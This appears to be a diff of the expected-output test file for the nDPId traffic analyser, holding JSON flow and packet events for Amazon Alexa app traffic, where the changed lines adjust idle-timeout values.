00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1490976031687,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976031687,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl0Y5AAEARu\/+sECoBrBAq2AA1oEYAUS8VStyBgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAA8ACwhwaXRhbmd1acASwC4AAQABAAAADwAENF7ohg=="} 00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":137,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976031581,"flow_last_seen":1490976031687,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976031687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031691,"flow_last_seen":1490976031691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976031691,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1490976031691,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976031691,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fGdAAEAGyoesECrYNF7ohsGkAFBD6jbWAAAAAKAC\/\/\/L1QAAAgQFtAQCCAoA9kqxAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1490976031773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976031773,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwMAtAAOcGb+80XuiGrBAq2ABQwaTMUP0xQ+o213ASH\/5qBQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1490976031774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976031774,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofGhAAEAGypqsECrYNF7ohsGkAFBD6jbXzFD9MlAQAVe0dgAA"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976031691,"flow_last_seen":1490976031776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":808,"flow_tot_l4_payload_len":808,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1490976031776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031691,"flow_last_seen":1490976031691,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976031691,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1490976031691,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976031691,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fGdAAEAGyoesECrYNF7ohsGkAFBD6jbWAAAAAKAC\/\/\/L1QAAAgQFtAQCCAoA9kqxAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1490976031773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976031773,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwMAtAAOcGb+80XuiGrBAq2ABQwaTMUP0xQ+o213ASH\/5qBQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1490976031774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976031774,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofGhAAEAGypqsECrYNF7ohsGkAFBD6jbXzFD9MlAQAVe0dgAA"} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976031691,"flow_last_seen":1490976031776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":808,"flow_tot_l4_payload_len":808,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1490976031776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976032763,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1490976032763,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1490976032763,"pkt":"MzMAAAAWePiC0\/vCht1gAAAAACQAAf6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHvkAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/0\/vC"} 00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976032763,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} @@ -124,49 +124,49 @@ 00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976035502,"flow_last_seen":1490976035502,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1490976035502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"cognito-identity.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1490976035549,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1490976035549,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC20jNAAEARuwmsECoBrBAq2AA1XAcAoid0gPuBgAABAAYAAAAAEGNvZ25pdG8taWRlbnRpdHkJdXMtZWFzdC0xCWFtYXpvbmF3cwNjb20AAAEAAcAMAAEAAQAAAAIABCLHNPDADAABAAEAAAACAAQ0AM87wAwAAQABAAAAAgAENBT4ysAMAAEAAQAAAAIABCLAPyvADAABAAEAAAACAAQ0ynf3wAwAAQABAAAAAgAENq23qQ=="} 00822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976035502,"flow_last_seen":1490976035549,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1490976035549,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"cognito-identity.us-east-1.amazonaws.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"34.199.52.240"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976035553,"flow_last_seen":1490976035553,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976035553,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1490976035553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976035553,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JIdAAEAG55WsECrYIsc08JXbAbv9XGi0AAAAAKAC\/\/\/OjgAAAgQFtAQCCAoA9kwzAAAAAAEDAwg="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1490976035610,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976035610,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOsGYRwixzTwrBAq2AG7ldsM0X8G\/VxotaASaN9A1wAAAgQFtAQCCApEF1TYAPZMMwEDAwg="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1490976035612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976035612,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0JIhAAEAG55ysECrYIsc08JXbAbv9XGi1DNF\/B4AQAVfXJgAAAQEICgD2TDlEF1TY"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976035553,"flow_last_seen":1490976035616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976035616,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01327{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":165,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3617,"flow_avg_l4_payload_len":452,"midstream":0,"thread_ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976037754,"flow_last_seen":1490976037754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976037754,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1490976037754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976037754,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8+KpAAEAGE3KsECrYIsc08JXcAbvRHbWkAAAAAKAC\/\/+tAQAAAgQFtAQCCAoA9k0OAAAAAAEDAwg="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1490976037803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976037803,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOoGYhwixzTwrBAq2AG7ldw4CtRs0R21paASaN+cagAAAgQFtAQCCApEF1cYAPZNDgEDAwg="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1490976037807,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976037807,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0+KtAAEAGE3msECrYIsc08JXcAbvRHbWlOArUbYAQAVcyugAAAQEICgD2TRREF1cY"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976037754,"flow_last_seen":1490976037809,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976037809,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":187,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976037754,"flow_last_seen":1490976037920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976037920,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976035553,"flow_last_seen":1490976035553,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976035553,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1490976035553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976035553,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JIdAAEAG55WsECrYIsc08JXbAbv9XGi0AAAAAKAC\/\/\/OjgAAAgQFtAQCCAoA9kwzAAAAAAEDAwg="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1490976035610,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976035610,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOsGYRwixzTwrBAq2AG7ldsM0X8G\/VxotaASaN9A1wAAAgQFtAQCCApEF1TYAPZMMwEDAwg="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1490976035612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976035612,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0JIhAAEAG55ysECrYIsc08JXbAbv9XGi1DNF\/B4AQAVfXJgAAAQEICgD2TDlEF1TY"} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976035553,"flow_last_seen":1490976035616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976035616,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01327{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":165,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3617,"flow_avg_l4_payload_len":452,"midstream":0,"thread_ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}} 